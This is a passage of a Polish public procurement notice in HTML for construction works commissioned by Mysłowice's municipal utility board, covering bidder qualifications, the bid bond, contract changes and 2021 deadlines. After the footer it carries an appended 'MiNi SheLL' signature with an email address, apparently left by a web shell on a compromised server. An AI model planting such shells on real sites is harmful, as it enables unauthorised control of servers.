posiadających odpowiednie uprawnienia branży elektrycznej (tj. SEP kat. “E” lub<br/>równorzędne). Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg<br/>formuły spełnia - nie spełnia, w oparciu o złożone dokumenty i oświadczenia. W celu<br/>potwierdzenia spełnienia warunków udziału w postępowaniu, wykonawca może polegać na<br/>potencjale podmiotu trzeciego na zasadach opisanych w art. 118–123 ustawy Pzp. Podmiot<br/>trzeci, na potencjał, którego wykonawca powołuje się w celu wykazania spełnienia warunków<br/>udziału w postępowaniu, nie może podlegać wykluczeniu na podstawie art. 108 ust. 1 oraz 109<br/>ust.1 pkt 4) ustawy Pzp. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">: Na podstawie art. 273 ustawy Pzp zamawiający żąda podmiotowych<br/>środków dowodowych na potwierdzenie: braku podstaw do wykluczenia spełnienia warunków udziału<br/>w postepowaniu Wykonawca dołącza do oferty oświadczenie o niepodleganiu wykluczeniu oraz<br/>spełnianiu warunków udziału w postępowaniu w zakresie wskazanym w rozdziale VI ust. 1 i VII ust. 1<br/>SWZ – Załącznik nr 4. Zgodnie z art. 274 ust. 1 ustawy Pzp, zamawiający przed wyborem<br/>najkorzystniejszej oferty wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących<br/>podmiotowych środków dowodowych: odpis z właściwego rejestru lub z centralnej ewidencji i informacji<br/>o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu<br/>potwierdzenia braku podstaw wykluczenia na podstawie art. 109 ust. 1 pkt 4 ustawy Pzp. Dokument<br/>winien być wystawiony nie wcześniej niż 3 miesiące przed jej złożeniem; od wykonawcy, który powołuje<br/>się na zasoby podmiotów trzecich, przedstawienia, w odniesieniu do tych podmiotów, podmiotowych<br/>środków dowodowych określonych w ust. 6 pkt 1) powyżej oraz spełnienia - w zakresie, w jakim<br/>wykonawca powołuje się na jego zasoby - warunki udziału w postępowaniu – jeżeli wykonawca polega<br/>na zasobach podmiotu trzeciego. Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie<br/>ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, porównywalnych z<br/>robotami budowlanymi stanowiącymi przedmiot zamówienia, wraz z podaniem ich rodzaju, wartości,<br/>daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem<br/>dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności<br/>informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo<br/>ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone<br/>przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej<br/>przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – inne<br/>odpowiednie dokumenty - załącznik nr 5 do SWZ. Wykaz osób skierowanych przez wykonawcę do<br/>realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami<br/>budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych/uprawnień niezbędnych do<br/>wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz<br/>informacją o podstawie do dysponowania tymi osobami – załącznik nr 6 do SWZ. Jeżeli wykonawca<br/>ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu,<br/>o których mowa w ust. 6 pkt 1), składa dokument lub dokumenty wystawione w kraju, w którym<br/>wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości - w zakresie określonym w art. 109 ust. 1 pkt 4 ustawy Pzp. Dokument<br/>powinien być wystawiony nie wcześniej niż 3 miesięcy przed upływem terminu składania ofert.<br/>Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać za<br/>pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w<br/>rozumieniu ustawy z 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania<br/>publiczne, o ile wykonawca wskazał w oświadczeniu wstępnym dane umożliwiające dostęp do tych<br/>środków.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający żąda od Wykonawców wniesienia wadium w wysokości 1815,00 zł (słownie:<br/>tysiąc osiemset piętnaście złotych 00/100) 2. Wadium może być wniesione w jednej lub kilku<br/>następujących formach: 1) pieniądzu; 2) gwarancjach bankowych; 3) gwarancjach<br/>ubezpieczeniowych; 4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.<br/>5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju<br/>Przedsiębiorczości (Dz. U. z 2020 r. poz. 299). 3. Wadium wnoszone w pieniądzu należy wpłacić<br/>przelewem na rachunek bankowy Zamawiającego PKO S.A. 55 1240 4315 1111 0000 5295<br/>8180 z opisaniem przelewu: „Wadium – ZP.271.2.4.2021”. Wadium wniesione w pieniądzu<br/>Zamawiający przechowuje na rachunku bankowym. UWAGA: Wadium w tej formie uważa się za<br/>wniesione w sposób prawidłowy, gdy środki pieniężne wpłyną na konto Zamawiającego przed<br/>upływem terminu składnia ofert. 4. Wadium wnoszone w formie poręczeń lub gwarancji musi być<br/>złożone jako oryginał gwarancji lub poręczenia w postaci elektronicznej i spełniać co najmniej<br/>poniższe wymagania: 1) musi obejmować odpowiedzialność za wszystkie przypadki powodujące<br/>utratę wadium przez Wykonawcę określone w ustawie PZP. 2) z jej treści powinno<br/>jednoznacznej wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium; 3) powinno być<br/>nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie; 4) termin obowiązywania<br/>poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą (z zastrzeżeniem, iż<br/>pierwszym dniem związania ofertą jest dzień składania ofert); 5) w treści poręczenia lub<br/>gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego postępowania; 6)<br/>beneficjentem poręczenia lub gwarancji jest: Miasto Mysłowice – Miejski Zarząd Gospodarki<br/>Komunalnej w Mysłowicach 5. Oferta wykonawcy, który nie wniesie wadium, wniesie wadium w<br/>sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie do upływu terminu związania<br/>ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3<br/>Ustawy PZP zostanie odrzucona 6. Zasady zwrotu oraz okoliczności zatrzymania wadium<br/>określa art. 98 Ustawy PZP <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku: <br/><br/>Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego. <br/><br/>Wszelka korespondencja będzie prowadzona przez zamawiającego wyłącznie z pełnomocnikiem. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1) zmiana wynagrodzenia Wykonawcy w następstwie: a. zmiany stawki podatku od towarów i<br/>usług – (będącej skutkiem działań organów państwowych, ustawowa zmiana obowiązującej<br/>stawki podatku od towarów i usług). Do faktur wystawianych po wejściu w życie zmiany stawki<br/>podatku VAT naliczana będzie nowa stawka; b. wystąpienia przypadku robót zaniechanych tj.<br/>rezygnacji z wykonania pewnych robót przewidzianych w Umowie. W takim przypadku<br/>Zamawiający zapłaci wynagrodzenie z tytułu wykonania części przedmiotu umowy; c. zmiany<br/>wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej,<br/>ustalonych na podstawie przepisów;d. zmiany zasad podlegania ubezpieczeniom społecznym<br/>lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub<br/>zdrowotne; 2) zmiana terminu realizacji przedmiotu umowy w następstwie: a. działania organów<br/>administracji lub innych podmiotów: - gdy pomimo wystąpienia o wydanie decyzji<br/>administracyjnej lub innego dokumentu niezbędnego do prawidłowej realizacji przedmiotu<br/>umowy w terminie ustawowo przewidzianym dla danej czynności organ administracji publicznej<br/>lub inna upoważniona instytucja nie wydała stosowanego dokumentu lub decyzji – tylko w<br/>zakresie przedłużenia terminu realizacji inwestycji i tylko o okres trwania tych czynności<br/>organów administracji publicznej lub instytucji przekraczający termin ustawowo przewidziany dla<br/>danej czynności; - gdy pozyskiwanie stosownych uzgodnień z gestorami sieci, z innymi<br/>podmiotami lub osobami, których opinia lub zgoda będzie wymagana przepisami prawa i<br/>przekroczy terminy zwyczajowo przyjęte dla danych czynności – tylko w zakresie przedłużenia<br/>terminu realizacji zamówienia i tylko o okres trwania tych czynności przekraczających termin<br/>zwyczajowo przyjęty dla danej czynności; b. konieczność przesunięcia terminu przekazania<br/>terenu budowy - tylko o okres przesunięcia, c. zaistnienia okoliczności leżących po stronie<br/>Zamawiającego w szczególności spowodowanych sytuacją finansową, zdolnościami płatniczymi<br/>lub warunkami organizacyjnymi lub okolicznościami, których Zamawiający nie mógł przewidzieć<br/>w chwili zawarcia umowy, z zastrzeżeniem, iż okoliczności te mogą stanowić podstawę zmiany<br/>terminu wykonania przedmiotu umowy tylko w przypadku, gdy uniemożliwią dotrzymanie<br/>terminów określonych w § 2 umowy. d. siły wyższeje. zawieszenia przez Zamawiającego<br/>wykonania robót z przyczyn technicznych; f. wystąpienia wad lub braków dokumentacji<br/>projektowej; g. konieczności wprowadzenia zmian w dokumentacji projektowej; h. koniczności<br/>wykonania robót dodatkowych; 3) zmiany, rezygnacji, bądź wprowadzenia Podwykonawcy4)<br/>zastąpienia Wykonawcy, któremu Zamawiający udzielił zamówienia, nowym Wykonawcą w<br/>wyniku połączenia, podziału, upadłości, restrukturyzacji lub nabycia dotychczasowego<br/>Wykonawcy lub jego przedsiębiorstwa,5) jeżeli konieczność zmiany umowy spowodowana jest<br/>okolicznościami, których Zamawiający, działając z należytą starannością, nie mógł przewidzieć,<br/>o ile zmiana nie modyfikuje ogólnego charakteru umowy a wzrost ceny spowodowany każdą<br/>kolejną zmianą nie przekracza 50% wartości pierwotnej umowy.2. Zamawiający dopuszcza<br/>możliwość wprowadzenia zmiany materiałów i urządzeń przedstawionych w ofercie pod<br/>warunkiem, że zmiany te będą korzystne dla Zamawiającego, w szczególności zmiany te: 1)<br/>skutkować będą obniżeniem kosztu ponoszonego przez Zamawiającego na eksploatację i<br/>konserwację wykonanego przedmiotu umowy; 2) skutkować będą poprawieniem parametrów<br/>technicznych; 3) wynikać będą z aktualizacji rozwiązań z uwagi na postęp technologiczny lub<br/>zmian obowiązujących przepisów; Szczegóły w par 16 wzoru umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-21 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-21 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-20</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> POUCZENIE O ŚRODKACH OCHRONY PRAWNEJ PRZYSŁUGUJĄCYCH WYKONAWCY W<br/>TOKU POSTĘPOWANIA O UDZIELENIE ZAMÓWIENIA Środki ochrony prawnej przysługują<br/>wykonawcy, jeżeli ma lub miał interes w uzyskaniu zamówienia oraz poniósł lub może ponieść<br/>szkodę w wyniku naruszenia przez zamawiającego przepisów Prawa zamówień publicznych.<br/>Odwołanie przysługuje na: a) niezgodną z przepisami ustawy czynność zamawiającego podjętą<br/>w postępowaniu o udzielenie zamówienia w tym na projektowane postanowienie umowy; b)<br/>zaniechanie czynności w postępowaniu o udzielenie zamówienia do której zamawiający był<br/>obowiązany na podstawie ustawy. Odwołanie wnosi się do Prezesa Krajowej Izby Odwoławczej<br/>w formie pisemnej albo w formie elektronicznej albo w postaci elektronicznej opatrzone<br/>podpisem zaufanym. Na orzeczenie Krajowej Izby Odwoławczej oraz postanowienie Prezesa<br/>Krajowej Izby Odwoławczej, o którym mowa w art. 519 ust. 1 ustawy Prawo zamówień<br/>publicznych, stronom oraz uczestnikom postępowania odwoławczego przysługuje skarga do<br/>sądu. Skargę wnosi się do Sadu Okręgowego w Warszawie za pośrednictwem Prezesa Krajowej<br/>Izby Odwoławczej. Szczegółowe informacje dotyczące środków ochrony prawnej określone są w<br/>Dziale IX „Środki ochrony prawnej” (art. 505 – 590 ustawy Pzp).</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-03 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com